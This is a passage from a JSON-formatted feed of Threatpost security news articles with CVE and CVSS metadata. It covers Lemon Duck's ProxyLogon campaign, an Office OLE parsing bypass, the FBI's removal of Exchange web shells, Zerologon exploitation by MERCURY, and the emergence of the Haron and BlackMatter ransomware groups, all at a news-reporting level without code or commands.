C:\\inetpub\\wwwroot\\aspnet_client\\, a known directory where a majority of the web shells were initially observed following Microsoft\u2019s release of details related to Hafnium activity,\u201d according to the research.\n\nNext, Cisco Talos researchers observed the echo command being used to write code associated with a web shell into the previously created ASPX files, and the modification of the Windows registry to enable RDP access to the system.\n\n\u201cIn this case, several characteristics matched portions of code associated with known China Chopper variants identified days after the Exchange Server vulnerabilities were publicized,\u201d they 
noted.\n\nOther interesting aspects of the latest campaign include the fact that Lemon Duck executes a PowerShell script that downloads and executes an additional malware payload, \u201csyspstem.dat,\u201d which includes a \u201ckiller\u201d module which contains a hardcoded list of competing cryptocurrency miners that Lemon Duck disables. The module is run every 50 minutes.\n\nAlso, the malware is now leveraging Certutil to download and execute two new malicious PowerShell scripts, researchers said. Certutil is a native Windows command-line program that is installed as part of Certificate Services. It is used to verify and dump Certificate Authority (CA) information, get and publish new certificate revocation lists, and so on.\n\nOne of the PowerShell scripts, named \u201cdn.ps1,\u201d attempts to uninstall multiple antivirus products, and also retrieves a Cobalt Strike payload.\n\n## **Cobalt Strike Added to the Mix**\n\n[Cobalt Strike is a penetration-testing tool](<https://threatpost.com/cobalt-ulster-strikes-again-with-new-forelord-malware/153418/>) that\u2019s commercially available. It sends out beacons to detect network vulnerabilities. When used for its intended purpose, it [simulates an attack](<https://www.cobaltstrike.com/features>). Threat actors have since figured out how to [turn it against networks](<https://threatpost.com/apt29-re-emerges-after-2-years-with-widespread-espionage-campaign/139246/>) to exfiltrate data, deliver malware and create fake C2 profiles that look legitimate and avoid detection.\n\nLemon Duck\u2019s Cobalt Strike payload is configured as a Windows DNS beacon and attempts to communicate with the C2 server using a DNS-based covert channel, researchers noted. 
The beacon then communicates with this specific subdomain to transmit encoded data via DNS A record query requests.\n\n\u201cThis represents a new TTP for Lemon Duck, and is another example of their reliance [on offensive security tools (OSTs)](<https://threatpost.com/malicious-software-infrastructure-easier-deploy/162913/>), including Powersploit\u2019s reflective loader and a modified Mimikatz, which are already included as additional modules and components of Lemon Duck and used throughout the typical attack lifecycle,\u201d according to Cisco Talos.\n\n## **Lemon Duck\u2019s Fresh Anti-Detection Tricks**\n\nWhile Lemon Duck casts a wide net in terms of victimology, it has been exclusively using websites within the TLDs for China (\u201c.cn\u201d), Japan (\u201c.jp\u201d) and South Korea (\u201c.kr\u201d) for its C2 activities since February, rather than the more familiar \u201c.com\u201d or \u201c.net.\u201d\n\n\u201cConsidering these [TLDs] are most commonly used for websites in their respective countries and languages\u2026this may allow the threat actor to more effectively hide C2 communications among other web traffic present in victim environments,\u201d according to Cisco Talos. \u201cDue to the prevalence of domains using these [TLDs], web traffic to the domains\u2026may be more easily attributed as noise to victims within these countries.\u201d\n\nDuring the Lemon Duck infection process, PowerShell is used to invoke the \u201cGetHostAddresses\u201d method from the .NET runtime class \u201cNet.Dns\u201d to obtain the current IP address for an attacker-controlled domain, researchers explained.\n\n\u201cThis IP address is combined with a fake hostname hardcoded into the PowerShell command and written as an entry to the Windows hosts file,\u201d they said. 
\u201cThis mechanism allows name resolution to continue even if DNS-based security controls are later deployed, as the translation is now recorded locally and future resolution requests no longer rely upon upstream infrastructure such as DNS servers. This may allow the adversary to achieve longer-term persistence once operational in victim environments.\u201d\n\n## **Cryptojackers Take Notice of ProxyLogon**\n\nLemon Duck is not the first cryptomining malware to add ProxyLogon to its arsenal. For instance, another cryptojacking group [was seen in mid-April](<https://threatpost.com/attackers-target-proxylogon-cryptojacker/165418/>) doing the same thing.\n\nThat bad code was fairly simple, but also in mid-April a heretofore little-seen Monero-mining botnet [dubbed Prometei](<https://threatpost.com/prometei-botnet-apt-attacks/165574/>) began exploiting two of the Microsoft Exchange vulnerabilities in ProxyLogon. This malware is also highly complex and sophisticated, Cybereason researchers noted at the time. While cryptojacking is its current game, researchers warned that Prometei (the Russian word for Prometheus, the Titan god of fire from Greek mythology) gives attackers complete control over infected machines, which makes it capable of doing a wide range of damage.\n\nThe threat will likely continue to evolve, Cisco Talos researchers said. They also observed domains linked to Lemon Duck and another cryptocurrency miner, DLTMiner, used in relation to Microsoft Exchange attacks where ransomware was also deployed.\n\n\u201cAt this time, there doesn\u2019t appear to be a link between the Lemon Duck components observed there and the reported ransomware (TeslaRVNG2),\u201d according to the analysis. \u201cThis suggests that given the nature of the vulnerabilities targeted, we are likely to continue to observe a range of malicious activities in parallel, using similar exploitation techniques and infection vectors to compromise systems. 
In some cases, attackers may take advantage of artifacts left in place from prior compromises, making distinction more difficult.\u201d\n\nMeanwhile, it\u2019s clear that the threat actor behind Lemon Duck is continuously evolving its approach to maximize the ability to achieve its mission objectives, researchers noted.\n\n\u201cLemon Duck continues to launch campaigns against systems around the world, attempting to leverage infected systems to mine cryptocurrency and generate revenue for the adversary behind this botnet,\u201d they concluded. \u201cThe use of new tools like Cobalt Strike, as well as the implementation of additional obfuscation techniques throughout the attack lifecycle, may enable them to operate more effectively for longer periods within victim environments. \u2026 Organizations should remain vigilant against this threat, as it will likely continue to evolve.\u201d
\n", "cvss3": {}, "published": "2021-05-10T17:37:44", "type": "threatpost", "title": "Lemon Duck Cryptojacking Botnet Changes Up Tactics", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2019-0708", "CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065"], "modified": "2021-05-10T17:37:44", "id": "THREATPOST:1084DB580B431A6B8428C25B78E05C88", "href": "https://threatpost.com/lemon-duck-cryptojacking-botnet-tactics/165986/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-02-08T11:40:52", "description": "SAN FRANCISCO \u2013 A previously unknown bug in Microsoft Office has been spotted being actively exploited in the wild; it can be used to bypass security solutions and sandboxes, according to findings released at the RSA Conference 2019.\n\nThe bug exists in the OLE file format and the way it\u2019s handled in Microsoft Word, said researchers from Mimecast. They noted that the OLE32.dll library incorrectly handles integer overflows.\n\nMicrosoft told the researchers that patching the problem is on the back burner.\n\nThe flaw allows attackers to hide exploits in weaponized Word documents in a way that won\u2019t trigger most antivirus solutions, the researchers said. In a recent spam campaign observed by Mimecast, attached Word documents contained a hidden exploit for an older vulnerability in Microsoft Equation Editor (CVE-2017-11882). On unpatched systems, the exploit unfolded to drop a new variant of Java JACKSBOT, a remote access backdoor that infects its target only if Java is installed.\n\nJACKSBOT is capable of taking complete control of the compromised system. 
It has full-service espionage capabilities, including the ability to collect keystrokes; steal cached passwords and grab data from web forms; take screenshots; take pictures and record video from a webcam; record sound from the microphone; transfer files; collect general system and user information; steal keys for cryptocurrency wallets; manage SMS for Android devices; and steal VPN certificates.\n\n\u201cThe thing that stands out for me is that the attackers behind this were keen on using the Equation exploit, probably because they found it more reliable than others, and they then worked out on a bypass to allow this go through undetected,\u201d Meni Farjon, chief scientist for advanced threat detection at Mimecast, told Threatpost. \u201cThis process of chaining these two, a code-execution exploit and a flaw which leads to a bypass is somewhat unique and we don\u2019t see many of these in data-format exploits.\u201d\n\n## The Flaw in Depth\n\nAn Object Linking and Embedding (OLE) Compound File essentially acts as an underlying file system for information and objects present in a Microsoft Word document. It contains streams of data that are treated like individual files embedded within the OLE file itself. Each stream has a name (for example, the top-level stream of a document is straightforwardly named \u201cWordDocument\u201d). 
Streams can also contain information on macros in the document and the metadata of a document (e.g., title, author, creation date).\n\nMimecast said that according to the format specifications for the Compound File Binary File Format, the OLE stream header contains a table called DIFAT, which is made up of an array of numbers that includes section IDs and some special numbers \u2013 it\u2019s here that the problem resides.\n\n\u201cTo access the sector N in the table, its offset is computed using the following formula: sector size * (sector ID + 1), when sector ID is DIFAT[N],\u201d the researchers explained in findings. \u201cIt seems that when a big sector ID exists, [this formula] leads to an integer-overflow that results in a relatively small offset. Because the result is more than 32 bits (integer overflow), only the lowest 32 bits will be the product when the code above performs the calculation. In other words, the calculated offset will be 0x200 = 512.\u201d\n\nThe system sees an impossible offset, according to the researchers; this can lead it to crash or, at the very least, ignore the section, including any exploit that may be hiding there.\n\n\u201cThis behavior is not documented by Microsoft, but it can confuse high-level parsers, which will not notice the overflow,\u201d Mimecast said.\n\n## In the Wild\n\nMimecast researchers said that they\u2019ve seen several attacks in the last few months that chain together the CVE-2017-11882 exploit with the OLE flaw, which has been successful, they said, in amplifying the attack to make it go undetected.\n\n\u201cOur systems were able to spot an attacker group, which seems to originate from Serbia, using specially crafted Microsoft Word documents\u2026in a way which caused the attacks to circumvent many security solutions designed to protect data from infestation,\u201d Mimecast said. 
The firm didn\u2019t specify which security solutions they\u2019re referring to.\n\n\u201c[With] this chaining of the older exploit with this integer overflow, Microsoft Office Word mishandles this error. It ignores the higher bytes of the OLE sector ID, loading the malicious object ([CVE-2017-11882](<https://nvd.nist.gov/vuln/detail/CVE-2017-11882>)) into memory while not following the correct guidelines,\u201d the researchers said.\n\nFarjon told Threatpost that although the newly found issue is being used in the wild, \u201cexploiting this is not an easy task, as it requires deep format understanding.\u201d It\u2019s the difficulty in execution that is likely behind Microsoft\u2019s decision to not immediately patch the problem, he said.\n\n## Microsoft Response\n\nDespite evidence that the flaw is being actively exploited to great effect in the wild, the Microsoft Security Response Center told Mimecast that it will not be fixing OLE with a security patch anytime soon, because the issue by itself does not result in memory corruption and thus doesn\u2019t meet the security bar for an immediate fix.\n\n\u201cWhat Microsoft said is that they won\u2019t be fixing it right now, but perhaps they will on a later undefined date,\u201d Farjon told Threatpost.\n\nHe added, \u201cThey said it is an unintended behavior, but at the same time that it is not important enough to fix right now. Realistically, Microsoft needs to prioritize their work on patches, so their decision makes sense. That being said, it\u2019s up to security professionals to make sure their systems are as up to date as possible and that they are leveraging the threat intelligence they need to better manage today\u2019s evolving threats.\u201d\n\nThe researcher also offered a bottom-line assessment: \u201cAnalyzing all possible outcomes of such flaw is a tough task,\u201d he said. 
\u201cMimecast worked with the Microsoft Security Response Center and they did analyze all possible outcomes, and came to the conclusion that it didn\u2019t result in memory corruption. So, while it may not be severe, having another tool for attackers to bypass security solutions is not a good thing.\u201d\n\nThreatpost reached out to the computing giant for comments on the findings, and received a short statement: \u201cThe bug submitted did not meet the severity bar for servicing via a security update,\u201d said a Microsoft spokesperson.\n", "cvss3": {}, "published": "2019-03-05T11:00:03", "type": "threatpost", "title": "RSAC 2019: Microsoft Zero-Day Allows Exploits to Sneak Past Sandboxes", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882", "CVE-2019-19781"], "modified": "2019-03-05T11:00:03", "id": "THREATPOST:93F1D3DD89A41A41475737BF84F8146C", "href": "https://threatpost.com/zero-day-exploit-microsoft/142327/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-04-15T09:53:19", "description": "The Feds have cleared malicious web shells from hundreds of vulnerable computers in the United States that had been compromised via the now-infamous ProxyLogon Microsoft Exchange vulnerabilities.\n\nProxyLogon comprises a group of security bugs affecting on-premises versions of Microsoft Exchange Server software for email. 
Microsoft last month warned that the bugs were being [actively exploited](<https://threatpost.com/microsoft-exchange-zero-day-attackers-spy/164438/>) by the Hafnium advanced persistent threat (APT); after that, other researchers said that [10 or more additional APTs](<https://threatpost.com/microsoft-exchange-servers-apt-attack/164695/>) were also using them.\n\nProxyLogon consists of four flaws (CVE-2021-26855, CVE-2021-26857, CVE-2021-26858, CVE-2021-27065) that can be chained together to create a pre-authentication remote code execution (RCE) exploit \u2013 meaning that attackers can take over servers without knowing any valid account credentials. This gives them access to email communications and the opportunity to install a web shell for further exploitation within the environment, such as the [deployment of ransomware](<https://threatpost.com/microsoft-exchange-exploits-ransomware/164719/>).\n\nWhile patching levels have accelerated, this doesn\u2019t help already-compromised computers.\n\n\u201cMany infected system owners successfully removed the web shells from thousands of computers,\u201d explained the Department of Justice, in a [Tuesday announcement](<https://www.justice.gov/usao-sdtx/pr/justice-department-announces-court-authorized-effort-disrupt-exploitation-microsoft>). \u201cOthers appeared unable to do so, and hundreds of such web shells persisted unmitigated.\u201d\n\nThis state of affairs prompted the FBI to take action; in a court-authorized action, it issued a series of commands through the web shells to the affected servers. The commands were designed to cause the server to delete only the web shells (identified by their unique file path). 
It didn\u2019t notify affected organizations ahead of time, but authorities said they\u2019re sending out notices now.\n\n\u201cToday\u2019s court-authorized removal of the malicious web shells demonstrates the Department\u2019s commitment to disrupt hacking activity using all of our legal tools, not just prosecutions,\u201d said Assistant Attorney General John Demers for the DoJ\u2019s National Security Division, in the statement.\n\n## **Unilateral FBI Action Against ProxyLogon Exploits**\n\nOther technical details of the action are being kept under wraps, but Erkang Zheng, founder and CEO at JupiterOne, noted that the action is unprecedented.\n\n\u201cWhat makes this really interesting is the court ordered remote remediation of vulnerable systems,\u201d he said via email. \u201cThis is the first time that this has happened and with this as a precedent, it likely won\u2019t be the last. Many enterprises today have no idea what their infrastructure and security state looks like \u2013 visibility is a huge problem for CISOs.\u201d\n\nDirk Schrader, global vice president of security research at New Net Technologies, noted that the FBI\u2019s lack of transparency could be problematic.\n\n\u201cThere are a few critical issues in this,\u201d he told Threatpost. 
\u201cOne is the FBI stating the action was because these victims lack the technical ability to clear their infrastructure themselves, another is that it seems the FBI intends to delay informing the victims about the removal itself by at least a month, citing ongoing investigations as a reason.\u201d\n\nHe explained, \u201cThis can cause other issues, as the victims have no chance to investigate what kind of information has been accessed, whether additional backdoors were installed, and a range of other concerns come with this approach.\u201d\n\nMonti Knode, director of customer and partner success at Horizon3.AI, noted that the action illuminates just how dangerous the bugs are.\n\n\u201cGovernment action is always predicated by an authority to act,\u201d he said via email. \u201cBy specifically calling out \u2018protected computers\u2019 and declaring them \u2018damaged\u2019, that appears to have been enough to give the FBI a signed warrant to execute such an operation without notifying victims ahead of the operation execution. While the scale of the operation is unknown (redacted in court order), the fact that the FBI was able to execute in less than four days, and then publicly release this effort, demonstrates the potential national security risk posed by these exploited systems and the prioritized planning involved. This isn\u2019t a knee-jerk reaction.\u201d\n\nThis operation was successful in copying and removing the web shells, the FBI reported. However, organizations still need to patch if they haven\u2019t yet done so.\n\n\u201cCombined with the private sector\u2019s and other government agencies\u2019 efforts to date, including the release of detection tools and patches, we are together showing the strength that public-private partnership brings to our country\u2019s cybersecurity,\u201d Demers said. 
\u201cThere\u2019s no doubt that more work remains to be done, but let there also be no doubt that the Department is committed to playing its integral and necessary role in such efforts.\u201d\n\n## New Exchange RCE Bugs and a Federal Warning\n\nThe news comes on the heels of [April Patch Tuesday](<https://threatpost.com/microsoft-april-patch-tuesday-zero-days/165393/>), in which Microsoft revealed more RCE vulnerabilities in Exchange (CVE-2021-28480 through CVE-2021-28483), which were discovered and reported by the National Security Agency. A [mandate to federal agencies](<https://cyber.dhs.gov/ed/21-02/#supplemental-direction-v2>) to patch them by Friday also went out.\n\nImmersive Labs\u2019 Kevin Breen, director of cyber-threat research, warned that weaponization of these may come faster than usual, since motivated attackers will be able to use existing proof-of-concept code.\n\n\u201cThis underlines the criticality of cybersecurity now to entire nations, as well as the continued blurring of the lines between nation-states, intelligence services and enterprise security,\u201d he added via email. \u201cWith a number of high-profile attacks affecting well-used enterprise software recently, the NSA are obviously keen to step up and play a proactive role.\u201d
\n", "cvss3": {}, "published": "2021-04-14T17:31:13", "type": "threatpost", "title": "FBI Clears ProxyLogon Web Shells from Hundreds of Orgs", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065", "CVE-2021-28480", "CVE-2021-28483"], "modified": "2021-04-14T17:31:13", "id": "THREATPOST:2FE0A6568321CDCF2823C6FA18106381", "href": "https://threatpost.com/fbi-proxylogon-web-shells/165400/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-10-14T22:08:35", "description": "Microsoft is warning that an Iranian nation-state actor is now actively exploiting the Zerologon vulnerability (CVE-2020-1472), adding fuel to the fire as the severe flaw continues to plague businesses.\n\nThe [advanced persistent threat](<https://threatpost.com/iranian-apt-targets-govs-with-new-malware/153162/>) (APT) actor, which Microsoft calls MERCURY (also known as MuddyWater, Static Kitten and Seedworm), has historically [targeted government victims](<https://threatpost.com/muddywater-apt-custom-tools/144193/>) in the Middle East to exfiltrate data. 
Exploiting the bug allows an unauthenticated attacker, with network access to a domain controller, to completely compromise all Active Directory identity services, according to Microsoft.\n\n\u201cMSTIC has observed activity by the nation-state actor MERCURY using the CVE-2020-1472 exploit (Zerologon) in active campaigns over the last 2 weeks,\u201d according to a [Microsoft tweet on Monday evening](<https://twitter.com/MsftSecIntel/status/1313246337153077250>).\n\nMicrosoft released a patch for the Zerologon vulnerability ([CVE-2020-1472](<https://www.tenable.com/cve/CVE-2020-1472>)) as part of its [August 11, 2020 Patch Tuesday security updates](<https://threatpost.com/microsoft-out-of-band-security-update-windows-remote-access-flaws/158511/>). The bug is located in a core authentication component of Active Directory within the Windows Server OS and the Microsoft Windows Netlogon Remote Protocol (MS-NRPC). [As previously reported](<https://threatpost.com/windows-exploit-microsoft-zerologon-flaw/159254/>), the flaw stems from the Netlogon Remote Protocol, available on Windows domain controllers, which is used for various tasks related to user and machine authentication.\n\n[Then, earlier in September, the stakes got higher](<https://threatpost.com/windows-exploit-microsoft-zerologon-flaw/159254/>) for risks tied to the bug when four public proof-of-concept exploits for the flaw were released on [GitHub](<https://github.com/dirkjanm/CVE-2020-1472>). This spurred the Secretary of Homeland Security to issue a rare emergency directive, ordering federal agencies to patch their Windows Servers against the flaw by Sept. 
21.\n\nMicrosoft\u2019s alert also comes [a week after Cisco Talos researchers warned of](<https://threatpost.com/zerologon-attacks-microsoft-dcs-snowball/159656/>) a spike in exploitation attempts against Zerologon.\n\n> MSTIC has observed activity by the nation-state actor MERCURY using the CVE-2020-1472 exploit (ZeroLogon) in active campaigns over the last 2 weeks. We strongly recommend patching. Microsoft 365 Defender customers can also refer to these detections: <https://t.co/ieBj2dox78>\n> \n> \u2014 Microsoft Security Intelligence (@MsftSecIntel) [October 5, 2020](<https://twitter.com/MsftSecIntel/status/1313246337153077250?ref_src=twsrc%5Etfw>)\n\nMicrosoft did not reveal further details of the MERCURY active exploitations in terms of victimology; however, a graph on its website shows that exploitation attempts (by attackers and red teams in general) started as early as Sept. 13 and have been ongoing ever since.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2020/10/06110502/1.png>)\n\nZerologon flaw attacker and red team activity. Credit: Microsoft\n\n\u201cOne of the adversaries noticed by our analysts was interesting because the attacker leveraged an older vulnerability for SharePoint (CVE-2019-0604) to exploit remotely unpatched servers (typically Windows Server 2008 and Windows Server 2012) and then implant a web shell to gain persistent access and code execution,\u201d said Microsoft [in an earlier analysis](<https://techcommunity.microsoft.com/t5/microsoft-365-defender/zerologon-is-now-detected-by-microsoft-defender-for-identity-cve/ba-p/1734034>). \u201cFollowing the web shell installation, this attacker quickly deployed a Cobalt Strike-based payload and immediately started exploring the network perimeter and targeting domain controllers found with the Zerologon exploit.\u201d\n\nMicrosoft for its part is addressing the vulnerability in a phased rollout. 
The initial deployment phase started with Windows updates being released on August 11, 2020, while the second phase, planned for the first quarter of 2021, will be an \u201cenforcement phase.\u201d\n", "cvss3": {}, "published": "2020-10-06T15:51:12", "type": "threatpost", "title": "Microsoft Zerologon Flaw Under Attack By Iranian Nation-State Actors", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2019-0604", "CVE-2020-1472", "CVE-2020-5135"], "modified": "2020-10-06T15:51:12", "id": "THREATPOST:51A2EB5F46817EF77631C9F4C6429714", "href": "https://threatpost.com/microsoft-zerologon-attack-iranian-actors/159874/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-07-29T00:41:11", "description": "So much for darkened servers at the headquarters of [DarkSide](<https://threatpost.com/darksides-servers-shutdown/166187/>) or [REvil](<https://threatpost.com/ransomware-revil-sites-disappears/167745/>) ransomware groups. Turns out, we\u2019ve got either their rebranded versions or two new ransomware gangs to contend with.\n\nThe first new group to appear this month was Haron, and the second is named BlackMatter. As [Ars Technica](<https://arstechnica.com/gadgets/2021/07/july-has-already-brought-us-2-new-ransomware-groups-hunting-for-big-game/?comments=1>)\u2019s Dan Goodin points out, there may be more still out there.\n\nThey\u2019re both claiming to be focused on targets with deep pockets that can pay ransoms in the millions of dollars. 
They\u2019re also virtue-signaling a la DarkSide, with similar language about sparing hospitals, critical infrastructure, nonprofits, etc.\n\nBlackMatter also promised free decryption if its affiliates screw up and kill kittens or freeze files at, say, pipeline companies, as happened when [Colonial Pipeline was attacked by DarkSide](<https://threatpost.com/colonial-pipeline-ransomware-emergency-declaration/165977/>) in May.\n\n## Haron & Its Cut-and-Paste Ransom Note\n\nThe first sample of the Haron malware was submitted to [VirusTotal](<https://www.virustotal.com/gui/file/6e6b78a1df17d6718daa857827a2a364b7627d9bfd6672406ad72b276014209c/detection>) on July 19. Three days later, the South Korean security firm S2W Lab reported on the group in a [post](<https://medium.com/s2wlab/quick-analysis-of-haron-ransomware-feat-avaddon-and-thanos-1ebb70f64dc4>) that laid out similarities between Haron and Avaddon.\n\nAvaddon is yet another prolific ransomware-as-a-service (RaaS) provider that [evaporated](<https://threatpost.com/avaddon-ransomware-global-crackdowns/166968/>) in June rather than face the legal heat that followed Colonial Pipeline and other big ransomware attacks. At the time, Avaddon [released its decryption keys](<https://www.bleepingcomputer.com/news/security/avaddon-ransomware-shuts-down-and-releases-decryption-keys/>) to BleepingComputer \u2013 2,934 in total \u2013 with each key belonging to an individual victim. According to law enforcement, the average extortion fee Avaddon demanded was about $40,000, meaning the ransomware operators and their affiliates quit and walked away from millions.\n\n## Or Did They?\n\nIn its July 22 post, S2W Lab said that when infected with Haron ransomware, \u201cthe extension of the encrypted file is changed to the victim\u2019s name.\u201d Haron is also similar to Avaddon ransomware in that its operators are using a ransom note and operating their own leak site. 
In its post, S2W provided side-by-side images of ransom notes from the two gangs.\n\nAs you can see below, the two ransom notes read like a cut-and-paste job. S2W Lab noted that the main difference is that Haron suggests a specific ID and Password for victims to log in to the negotiation site.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2021/07/28120546/Haron-Avaddon-ransom-notes.png>)\n\nRansom notes from Avaddon and Haron. Source: S2W Lab.\n\nThere are loads of other similarities between Haron and Avaddon, including:\n\n * Yet more cut-and-paste verbiage on the two negotiation sites.\n * Nearly identical appearances of the negotiation sites, besides the ransomware name of \u201cAvaddon\u201d being swapped for \u201cHaron.\u201d\n * Identical chunks of open-source JavaScript code used for chat that was previously published on a Russian developer forum.\n * The two leak sites share the same structure.\n\nIf Haron is Avaddon reborn, the new bottles for the old wine include a strategy to induce negotiations by setting a time for the next data update. Another difference: no [triple-threat play](<https://blogs.blackberry.com/en/2021/06/threat-thursday-avaddon-ransomware-uses-ddos-attacks-as-triple-threat>) to be seen from Haron, at least not yet. In triple-threat attacks, not only is data encrypted locally and exfiltrated before the ransom demand is made, but recalcitrant victims are also subjected to threats of distributed denial-of-service (DDoS) attack until they yield.\n\nAlso, Haron has shrunk the negotiation time to six days, whereas Avaddon allotted 10 days for negotiation. 
Another difference is in the engines running the two ransomwares: S2W Lab said that Haron is running on the [Thanos](<https://threatpost.com/thanos-ransomware-weaponize-riplace-tactic/156438/>) ransomware \u2013 a \u201cRansomware Affiliate Program,\u201d similar to a ransomware-as-a-service (RaaS), that\u2019s been sold since 2019 \u2013 whereas Avaddon was written in C++.\n\nNone of the similarities are solid proof of Avaddon having risen from the ashes like a ransomware phoenix: They could simply point to one or more threat actors from Avaddon working on a reboot, or they could point to nothing at all.\n\n\u201cIt is difficult to conclude that Haron is a re-emergence of Avaddon based on our analysis,\u201d according to S2W\u2019s writeup, which pointed out that \u201cAvaddon developed and used their own C++ based ransomware,\u201d whereas the publicly available Thanos ransomware that Haron is using is based on C#.\n\nSentinelOne\u2019s Jim Walter told Ars that he\u2019s seen what look like similarities between Avaddon and Haron samples, but he\u2019ll know more soon.\n\nAs of July 22, Haron\u2019s leak site had only disclosed one victim.\n\n## BlackMatter\n\nThe second ransomware newbie calls itself BlackMatter. News about the new network was reported on Tuesday by security firm Recorded Future \u2013 which labeled it a [successor to DarkSide and REvil](<https://www.recordedfuture.com/blackmatter-ransomware-successor-darkside-revil/>) \u2013 and by its news arm, [The Record](<https://therecord.media/blackmatter-ransomware-targets-companies-with-revenues-of-100-million-and-more/>). 
Risk intelligence firm Flashpoint also [spotted the newcomer](<https://www.flashpoint-intel.com/blog/chatter-indicates-blackmatter-as-revil-successor/>), noting that BlackMatter registered an account on the Russian-language underground forums XSS and Exploit on July 19 and deposited 4 bitcoins (approximately $150,000 USD as of Wednesday afternoon) into its Exploit escrow account.\n\nBoth of those forums [banned ransomware discussion](<https://threatpost.com/darkside-toshiba-xss-bans-ransomware/166210/>) in May, following DarkSide\u2019s attack on Colonial Pipeline. In the wake of that catastrophic shutdown, which sparked gas hoarding along the East coast and an emergency order from the federal government, REvil instituted pre-moderation for its partner network, saying that it would ban any attempt to attack any government, public, educational or healthcare organizations.\n\nReferring to DarkSide\u2019s experience, REvil\u2019s backers said that the group was \u201cforced to introduce\u201d these \u201csignificant new restrictions,\u201d promising that affiliates that violated the new rules would be kicked out and that it would give out decryption tools for free.\n\nFlashpoint noted that the large deposit on the Exploit forum shows that BlackMatter is serious.\n\nOn July 21, the threat actor said that the network is looking to buy access to affected networks in the U.S., Canada, Australia, and the UK, presumably for ransomware operations. It\u2019s offering up to $100,000 for network access, as well as a cut of the ransom take.\n\n## Putting Up Big Money for Big Fish\n\nBlackMatter is putting up big money because it\u2019s after big fish. The group said that it was looking for deep-pocketed organizations with revenues of more than $100 million: the size of organizations that could be expected to pay big ransoms. The threat actor is also requiring that targets have 500-15,000 hosts in their networks. 
It\u2019s also up for all industries, except for healthcare and governments.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2021/07/28133422/BlackMatter-post-on-Exploit-e1627493683950.png>)\n\nBlackMatter ad on the Exploit underground forum. Source: Recorded Future.\n\n## \u2018We Are Ethical Blood Suckers\u2019\n\nThat\u2019s where the virtue signaling comes in. The Record reports that BlackMatter\u2019s leak site is currently empty, which means that BlackMatter only launched this week and hasn\u2019t yet carried out any network penetrations.\n\nWhen it does go after victims, the list won\u2019t include a roster of target types that is currently, supposedly, taboo to target. A section of BlackMatter\u2019s leak site lists the type of targets that are off-limits, including:\n\n * Hospitals\n * Critical infrastructure facilities (nuclear power plants, power plants, water treatment facilities)\n * Oil and gas industry (pipelines, oil refineries)\n * Defense industry\n * Non-profit companies\n * Government sector\n\nSound familiar? That\u2019s because it\u2019s a dead ringer for a list formerly provided on the leak site of the DarkSide gang before it supposedly went belly-up following the Colonial attack. Promises not to attack these types of organizations aren\u2019t always adhered to by these gangs\u2019 affiliates, but BlackMatter has promised that if victims from those industries are attacked, the operators will decrypt their data for free.\n\n## Buying Legitimacy\n\nMike Fowler, vice president of intelligence services at GroupSense \u2013 a firm that offers threat intelligence and [ransom negotiation](<https://threatpost.com/whats-next-revil-victims/167926/>) \u2013 has been keeping an eye on BlackMatter. 
He told Threatpost on Wednesday that lately, there\u2019s been an evolution in tactics, techniques and processes (TTP) used by emerging RaaS cartels such as [Hive](<https://blogs.blackberry.com/en/2021/07/threat-thursday-hive-ransomware>), [Grief](<https://securityaffairs.co/wordpress/118446/cyber-crime/prometheus-grief-ransomware.html>) and, most recently, BlackMatter: an evolution reminiscent of the [2020 shift to double extortion](<https://threatpost.com/double-extortion-ransomware-attacks-spike/154818/>) pioneered by [Maze](<https://threatpost.com/maze-ransomware-cognizant/154957/>).\n\n\u201cGroupSense has witnessed an expected jockeying for position and brand awareness within the RaaS cartels,\u201d Fowler said in an email. \u201cThis was clearly evidenced by BlackMatter\u2019s account registration on the top two cybercrime forums. Their deposit of 4 Bitcoins into their escrow account on the largest Russian cybercrime forum, Exploit, is clearly an attempt to purchase legitimacy.\u201d\n\n## Careful Victim Targeting\n\nDigital Shadows\u2019 Sean Nikkel told Threatpost on Wednesday that the careful selection of big companies reflects the increasing number of threat actors that are \u201cdoing their due diligence\u201d when it comes to selecting victims.\n\n\u201cWe\u2019ve seen time and again when they have some knowledge around key personalities within an organization, revenue, size, and even customers, so the idea of big game hunting seems to be in line with observed ransomware trends,\u201d Nikkel said via email.\n\nHe called the virtue signaling and promise to do right by the exempted industries an \u201cinteresting twist.\u201d\n\n\u201cWhile REvil had publicly stated that everything was fair game previously, maybe this cooling-off period from previous attention has forced a change of heart, if it is indeed them coming back,\u201d Nikkel added.\n\n\u201cInteresting\u201d is one way to frame it. 
Another way to look at it is as squeaking from blood-sucking parasites, as a commenter on Ars\u2019 coverage suggested:\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2021/07/28095200/nehinks-tick-comment-e1627480332556.jpg>)\n\nNeither was GroupSense\u2019s Fowler impressed by BlackMatter\u2019s \u201cpinky promise\u201d not to victimize certain business segments. He said it rings particularly hollow \u201cgiven their rise to prominence as REvil\u2019s standing as the #2 RaaS fades into obscurity.\u201d\n\nStill, to put it all into perspective, while BlackMatter is \u201cthe flavor of the day,\u201d Fowler says that other RaaS services, such as Conti, Grief, Hive and LockBit, are \u201cjust as big a threat.\u201d\n\n## Ransomware Phoenixes or New Ratbags? Time Will Tell\n\nDirk Schrader, global vice president of security research at New Net Technologies (NNT), told Threatpost on Wednesday that anybody who didn\u2019t see REvil or DarkSide re-emerging might not have their head screwed on right. There\u2019s a \u201cgood chance\u201d that REvil decided proactively \u201cto take down everything and to re-emerge, just to make tracking and tracing even more difficult,\u201d he added in an email.\n\nMeanwhile, whatever sabre-rattling the Biden administration has been doing at Russia or China about kinetic responses and hack-backs won\u2019t change the situation, Schrader predicted. As it is, the threat actors 